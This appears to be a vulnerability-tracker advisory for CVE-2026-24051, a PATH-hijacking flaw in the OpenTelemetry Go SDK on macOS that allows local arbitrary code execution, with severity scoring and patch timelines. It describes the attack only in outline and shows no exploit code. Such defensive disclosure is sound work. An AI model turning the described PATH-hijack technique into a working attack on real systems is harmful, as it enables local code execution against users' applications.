CVE-2026-24051
HIGH
GHSA-9h8m-3fm2-qjrq
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
3Tags
Description
OpenTelemetry-Go is the Go implementation of OpenTelemetry. The OpenTelemetry Go SDK in version v1.20.0-1.39.0 is vulnerable to Path Hijacking (Untrusted Search Paths) on macOS/Darwin systems. The resource detection code in sdk/resource/host_id.go executes the ioreg system command using a search path. An attacker with the ability to locally modify the PATH environment variable can achieve Arbitrary Code Execution (ACE) within the context of the application. A fix was released with v1.40.0.
Analysis
Arbitrary code execution in OpenTelemetry Go SDK versions 1.20.0 through 1.39.0 on macOS results from insecure PATH resolution when executing the ioreg system command during resource detection. A local attacker with the ability to modify the PATH environment variable can hijack the command search path and execute arbitrary code with the privileges of the affected application. …
Sign in for full analysis, threat intelligence, and remediation guidance.
Remediation
Within 24 hours: Inventory all systems running OpenTelemetry-Go SDK versions 1.20.0-1.39.0, particularly macOS-based infrastructure and development environments. Within 7 days: Apply available patches to all affected systems and verify successful deployment. …
Sign in for detailed remediation steps.
Priority Score
Vendor Status
Share
External POC / Exploit Code
Leaving vuln.today